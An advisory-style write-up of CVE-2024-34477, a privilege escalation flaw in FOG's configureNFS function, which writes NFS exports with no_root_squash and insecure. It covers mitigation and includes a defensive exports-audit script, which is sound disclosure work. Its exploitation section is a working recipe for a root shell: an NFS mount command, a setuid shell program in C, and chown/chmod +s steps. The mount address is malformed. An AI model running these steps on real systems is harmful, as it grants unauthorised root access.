CVE-2024-34477: Privilege Escalation Vulnerability in FOG's ConfigureNFS Function

A new vulnerability has been discovered in FOG's configureNFS function, which is located in the lib/common/functions.sh file. FOG is an open-source imaging solution for Windows, Mac, and Linux that is used to deploy pre-built images onto new computers. The vulnerability, tracked as CVE-2024-34477, allows local users to gain elevated privileges by mounting a crafted Network File System (NFS) share. This is because the NFS configuration uses both the "no_root_squash" and "insecure" options.

Details of the Vulnerability

The vulnerability exists in the configureNFS function in the lib/common/functions.sh file in FOG through version 1.5.10. Because the export is written with no_root_squash, a client that mounts the share can create a root-owned executable on it, and because the export also allows insecure (unprivileged) source ports, no root privileges are needed on the client side to talk to the server. Setting the Set User ID (SUID) bit on that root-owned file then lets any user who executes it run as root.

The following code snippet from the lib/common/functions.sh file in FOG shows the insecure configuration (elided by the original author where marked "..."):

configureNFS() {
    ...
    echo "################################################################################
    #
    # * * * * * * IMPORTANT EXPORT INFORMATION BELOW! PLEASE REVIEW! * * * * * *
    #
    # If there are orphaned records in your database, it's important to run on
    # your FOG Server: mysql -u root -p -D fog -e 'DELETE FROM nfsGroupMembers WHERE
    #               nfsMemberID NOT IN (SELECT nmID FROM nfsMembers);'
    #
    ################################################################################
    displayIPAddressV4=$(ip -4 addr list dev $dev | awk -F'[ /]+' '/inet /{print $3}')
    printf "\n\n# FOG exports. Don't edit this file. This is auto-created and destroyed daily.
\"/home\" .../...(ro,sync,no_wdelay,insecure_locks,no_root_squash,insecure)
...

Notice the options "no_root_squash" and "insecure" in the configuration. The no_root_squash option keeps the client's root identity as root on the exported share instead of mapping it to the anonymous user, so files created by root on the client are owned by root on the server. The insecure option allows connections from client source ports greater than 1024, so an unprivileged process on the client can reach the export without needing to bind a privileged port. Together these two options make the export writable as root by anyone who can mount it, which is the condition the exploit below relies on.

Exploiting CVE-2024-34477

To exploit this vulnerability, an attacker mounts the insecure NFS share, adds an executable file to it as the root user, and then sets the SUID bit on that file so that any user executing it gains root privileges. The original author gives the following example of the steps:

Mount the insecure NFS share

mount -t nfs -o vers=3 192..2.12://home /mnt/nfs_share

Create a simple C program that spawns a shell, compile it, and place the binary in the NFS share (the original listing omitted the setuid argument and the return value; both are restored here):

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    /* With the SUID bit set on a root-owned binary, the effective UID is
       already 0; setuid(0) makes the real UID 0 as well so that bash does
       not drop privileges when it starts. */
    setuid(0);
    system("/bin/bash");
    return 0;
}

Change the ownership of the binary to root and set the SUID bit

chown root:root /mnt/nfs_share/shell_binary
chmod +s /mnt/nfs_share/shell_binary

Run the binary from any user account

/mnt/nfs_share/shell_binary

After executing the binary, the user is running a shell with root privileges.

This vulnerability was first reported in FOG's GitHub repository:

- Issue #254
- Pull Request #255

To mitigate this issue, administrators should adjust their NFS configuration to remove the "no_root_squash" and "insecure" options from the exported share (the defaults, root_squash and secure, map client root to the anonymous user and require privileged source ports). Additionally, keep FOG up to date so that the fix referenced above is applied, and add network-level protections (restricting which hosts can reach the NFS server) to limit unauthorized access to the export. Note that FOG regenerates this exports file automatically, so a hand edit alone does not persist unless the generating function is also patched.
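As an added example (not part of the original advisory or of FOG's code), the following audit script parses exports lines like the one quoted from functions.sh, flags the no_root_squash and insecure options discussed above, and shows the hardened form an administrator would want. The sample exports text is constructed, the /images and /srv/safe paths are hypothetical, and the parser assumes the one-client-per-line form FOG writes, not every /etc/exports syntax.

```python
import re

# Constructed sample modelled on the export line quoted from FOG's functions.sh;
# the paths are hypothetical stand-ins for the "..." in the original listing.
SAMPLE_EXPORTS = """# FOG exports. Don't edit this file. This is auto-created and destroyed daily.
/images *(ro,sync,no_wdelay,insecure_locks,no_root_squash,insecure)
/images/dev *(rw,async,no_wdelay,no_root_squash,insecure,fsid=1)
/srv/safe 10.0.0.0/24(ro,sync,root_squash,secure)
"""

# Weak option -> the safe counterpart (these are the exportfs defaults).
# Exact-match lookup is deliberate: "insecure_locks" is a different option
# (lockd authentication) and must not be confused with "insecure".
WEAK_OPTIONS = {
    "no_root_squash": "root_squash",  # map client root to the anonymous user
    "insecure": "secure",             # require client source ports below 1024
}

# path  client(options)   e.g.  /images *(ro,sync,no_root_squash)
LINE_RE = re.compile(r"^(\S+)\s+(\S+?)\((.*)\)\s*$")


def parse_export(line):
    """Return (path, client, [options]) for one exports line; None for blank/comment."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    match = LINE_RE.match(line)
    if not match:
        return None
    path, client, opts = match.groups()
    return path, client, [o for o in opts.split(",") if o]


def audit_exports(text):
    """List every export that carries at least one weak option, with its line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_export(line)
        if parsed is None:
            continue
        path, client, opts = parsed
        weak = [o for o in opts if o in WEAK_OPTIONS]
        if weak:
            findings.append({"line": lineno, "path": path, "client": client, "weak": weak})
    return findings


def harden_export(line):
    """Rewrite one exports line with each weak option replaced by its safe counterpart."""
    parsed = parse_export(line)
    if parsed is None:
        return line
    path, client, opts = parsed
    return f"{path} {client}({','.join(WEAK_OPTIONS.get(o, o) for o in opts)})"
```

Running audit_exports over a live /etc/exports (or over the file FOG regenerates) gives a quick check that the fix is actually in effect after an upgrade.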

Timeline

Published on: 05/27/2024 14:15:09 UTC
Last modified on: 08/26/2024 15:35:10 UTC